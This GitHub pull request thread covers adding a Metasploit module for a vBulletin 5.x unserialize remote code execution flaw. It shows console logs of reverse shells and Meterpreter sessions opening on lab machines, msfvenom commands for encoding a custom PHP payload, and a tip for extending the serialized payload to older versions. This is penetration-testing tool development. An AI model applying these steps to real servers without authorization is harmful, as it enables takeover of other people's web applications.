### PR TITLE
Implement a module for the recent vBulletin RCE

### PR DESCRIPTION
**Pull request by jvoisin**
This module implements the recent unserialize-powered RCE against [vBulletin](https://www.vbulletin.com/) 5.1.X

Step to reproduce:
1. Install vBulletin 5.1.X (It's not a free software, you have to buy it)
2. Launch the exploit against it

```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
```

```
msf exploit(vbulletin) > run

[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100

meterpreter > getuid
Server username: www-data (33)
```

### CODE REVIEW

**Comment by all3g** [comment]
Please **TARGETURI** option here and let's set vBulltin url.

**Comment by madmike33** [comment]
@jvoisin when running it iam getting
[] Started reverse handler on (my:ip) 4444
[] Exploit completed, but no session was created.

**Comment by jvoisin** [comment]
Super-sorry, I had an encoder enabled!
I added double-quotes as a badchar, it should work now

File: modules/exploits/unix/webapp/vbulletin_unserialize.rb [hunk 1]
```diff
@@ -0,0 +1,75 @@
...
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
+        ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({ 'uri' => '/' })
```
Comment (wchen-r7) [inline modules/exploits/unix/webapp/vbulletin_unserialize.rb]: You should probably make use of the URI from ```TARGETURI```

File: modules/exploits/unix/webapp/vbulletin_unserialize.rb [hunk 2]
```diff
@@ -0,0 +1,75 @@
...
+    if (res && res.body =~ /Version 5.1./ && res.body =~ /Copyright &copy; 2015 vBulletin Solutions, Inc./)
```
Comment (wchen-r7) [inline modules/exploits/unix/webapp/vbulletin_unserialize.rb]: Remember to escape the dots :-)

Or if you want, you can do: ```res.body.include?()```, which doesn't use a regex.

**Comment by wchen-r7** [comment]
:+1:

**Comment by madmike33** [comment]
GREAT JOB MATE !!! :)

**Comment by madmike33** [comment]
However when trying to implement a custom payload i get this .
Exploit failed: No encoders encoded the buffer successfully.

**Comment by jvoisin** [comment]
Shall I enforce the use of the `php/base64` encoder then?

**Comment by madmike33** [comment]
Yes i think you should, the payload need to be encoded :)

**Comment by jvoisin** [comment]
Specifying the badchars isn't enough?

**Comment by madmike33** [comment]
Depends but lets say if your aim is to upload the payload i think it isnt enough :+1:

**Comment by madmike33** [comment]
Or maybe the best option is to make it uploaded a reverse shell, in this case you need base64/ but atleast will save lots of time.

**Comment by wchen-r7** [comment]
@madmantm For the encoder failure you hit, you were doing this? ```set payload generic/custom``` ?

**Comment by Hood3dRob1n** [comment]
if you change vB_Database_MySQLi to vB_Database and adjust the string length from 18 to 11 in the  serialized string, it also works against 5.0.0 - 5.0.5 as well ;)

**Comment by all3g** [comment]
@jvoisin  Cool ! It exploits **Windows 7 Home Premium Edition + vBulltin 5.1.7** successfully. **vBulletin 5.1.2** is one of targets.

```
msf exploit(vbulletin_unserialize) > check 
[*] 192.168.1.101:80 - Cannot reliably check exploitability.
msf exploit(vbulletin_unserialize) > run 

[*] Started reverse handler on 192.168.1.108:4444 
[*] Sending stage (33068 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.101:1037) at 2015-11-07 02:57:33 +0000

meterpreter > sysinfo 
Computer    : SECLAB
OS          : Windows NT SECLAB 6.1 build 7601 (Windows 7 Home Premium Edition Service Pack 1) i586
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.101 - Meterpreter session 1 closed.  Reason: User exit

```

**Comment by madmike33** [comment]
Good point @Hood3dRob1n

**Comment by madmike33** [comment]
But i think the module need to modified so it uploads a payload directly, i mean i have tested it on local host it works great but i hosted on one of my offshore servers, it shows nothing all i get is this 
[] Started reverse handler on (my:ip) 4444
[] Exploit completed, but no session was created.

**Comment by madmike33** [comment]
@wchen-r7  i think you ment me ? well i tried for some reason nothing changed same.. any other suggestions ?

**Comment by wchen-r7** [comment]
@madmike33 Yeah sorry, I meant you.

I looked into the problem a little bit deeper. It turns out the exploit isn't at fault causing the user unable to use a custom payload, in fact it's actually the payloads/single/generic/custom.rb always forcing the 'none' encoder. Basically this means this is a wide-spread issue in Metasploit Framework. When you use the generic/custom payload, encoding is just not supported regardless what exploit you're using.

This is the bug:
https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/generic/custom.rb#L57

Basically in that loops, it means "I only accept the generic/none encoder".

The good news is.......... I don't think this issue should be a blocker for this exploit. But we definitely need to file it.

**Comment by wchen-r7** [comment]
@madmike33 Also, I think the workaround for you is:

1. Save your custom PHP payload as a file (let's call it "/tmp/test.php" here)
2. Use msfvenom to encode it manually: ```cat /tmp/test.php | ./msfvenom -e php/base64 --arch=php --platform=php -o /tmp/encoded_php_payload.php```
3. Load the exploit
4. ```set payload generic/custom```
5. ```set PAYLOADFILE /tmp/encoded_php_payload.php```
6. Configure the rest of the mandatory database options
7. ```run```. The exploit should fire without the encoding problem.

**Comment by madmike33** [comment]
@wchen-r7 well i didnt know this is a bug untill recently because honestly i have been using custom payload on all the msf modules i just had problems with some of them,but not all on general,however i will try what you suggested and provide a feedback however what is the reason you think about my other issue when i run the module against some remote website i have made for test all i get is
[*] Started reverse handler on 192.168.1.108:4444
And thats it not shell no nothing i didnt have time to wireshark it but... I dnt think its a problem from my side.

**Comment by jvoisin** [comment]
The exploit now supports 5.0.x and 5.1.x
Thank you for the feedback @all3g

**Comment by madmike33** [comment]
@jvoisin any idea about my issue :/

**Comment by jvoisin** [comment]
@wchen-r7 already explained the issue, and even gave you a workaround.

**Comment by wchen-r7** [comment]
@madmike33 You were testing against a live webiste? Chances are your payload was being blocked by something from the website: antivirus, IPS, WAF, server-side network configuration, etc. It's probably not your fault, and I doubt it's the exploit's fault either. This would be difficult for me to help you any further, because I'm not able to verify the legitimacy of your pentest (no offense). Sorry.

**Comment by madmike33** [comment]
Sure man i do own this server and i have ran a vbulletin installation just to test this module however i do understand. Dnt worry i will figure it out myself :)

**Comment by madmike33** [comment]
Thank You @wchen-r7  problem solved after i did what u said :) and Thank You @jvoisin  for the module. !!!

**Comment by wchen-r7** [comment]
:+1: 

I will try to land the module as soon as possible.

**Comment by wchen-r7** [comment]
Does anybody have a vBulletin 5.0.0 beta 13? This is what I have.... and the exploit doesn't work against it.

**Comment by madmike33** [comment]
Yes for me 5.0.0 beta 13 also doesnt work.

**Comment by wchen-r7** [comment]
@jvoisin Could you please send me a pcap of the exploit successfully getting a shell? Please send to wei_chen[at]rapid7.com. Thanks!

**Comment by jvoisin** [comment]
@wchen-r7 done.
Please squash my commit before merging it :)

**Comment by wchen-r7** [comment]
Got the pcap, thank you!

**Comment by wchen-r7** [comment]
Merged. Thanks everyone for testing!

BTW, since @all3g says it works on Windows too (and it looks like it does), I moved the module to https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/vbulletin_unserialize.rb.

**Pull request merged**